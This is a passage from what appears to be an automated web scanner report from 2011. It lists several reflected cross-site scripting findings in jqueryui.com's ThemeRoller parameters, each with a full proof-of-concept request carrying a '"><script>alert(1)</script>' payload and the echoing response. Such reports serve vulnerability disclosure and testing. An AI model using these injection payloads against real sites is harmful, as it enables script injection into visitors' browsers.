fault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e783ee2"><script>alert(1)</script>a004327990c&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec
...[SNIP]...

4.158. http://jqueryui.com/themeroller/ [cornerRadius parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the cornerRadius request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe97e"><script>alert(1)</script>d413db24598 was submitted in the cornerRadius parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5pxfe97e"><script>alert(1)</script>d413db24598&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:39:52 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5pxfe97e"><script>alert(1)</script>d413db24598&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bg
...[SNIP]...

4.159. http://jqueryui.com/themeroller/ [fcContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0238"><script>alert(1)</script>f3b7584a347 was submitted in the fcContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222a0238"><script>alert(1)</script>f3b7584a347&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:40:42 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
cityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222a0238"><script>alert(1)</script>f3b7584a347&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover
...[SNIP]...

4.160. http://jqueryui.com/themeroller/ [fcDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6908e"><script>alert(1)</script>f728313c9af was submitted in the fcDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e6908e"><script>alert(1)</script>f728313c9af&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:41:30 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
acityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e6908e"><script>alert(1)</script>f728313c9af&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_
...[SNIP]...

4.161. http://jqueryui.com/themeroller/ [fcHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70262"><script>alert(1)</script>3ef1456697c was submitted in the fcHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff70262"><script>alert(1)</script>3ef1456697c&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:40:14 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff70262"><script>alert(1)</script>3ef1456697c&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextu
...[SNIP]...

4.162. http://jqueryui.com/themeroller/ [fcHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb112"><script>alert(1)</script>0ae51754bf3 was submitted in the fcHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987bb112"><script>alert(1)</script>0ae51754bf3&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:42:32 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987bb112"><script>alert(1)</script>0ae51754bf3&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHig
...[SNIP]...

4.163. http://jqueryui.com/themeroller/ [ffDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the ffDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 589a3"><script>alert(1)</script>546c2a2a8d6 was submitted in the ffDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif589a3"><script>alert(1)</script>546c2a2a8d6&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:39:38 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif589a3"><script>alert(1)</script>546c2a2a8d6&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorCont
...[SNIP]...

4.164. http://jqueryui.com/themeroller/ [fsDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fsDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63655"><script>alert(1)</script>f4ad536432 was submitted in the fsDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em63655"><script>alert(1)</script>f4ad536432&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:39:48 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120173

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em63655"><script>alert(1)</script>f4ad536432&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_
...[SNIP]...

4.165. http://jqueryui.com/themeroller/ [fwDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fwDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16422"><script>alert(1)</script>2726a46e7ea was submitted in the fwDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold16422"><script>alert(1)</script>2726a46e7ea&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:39:42 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120111

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold16422"><script>alert(1)</script>2726a46e7ea&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTe
...[SNIP]...

4.166. http://jqueryui.com/themeroller/ [iconColorContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2c17"><script>alert(1)</script>2ef784c42 was submitted in the iconColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdde2c17"><script>alert(1)</script>2ef784c42&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:40:45 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120170

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
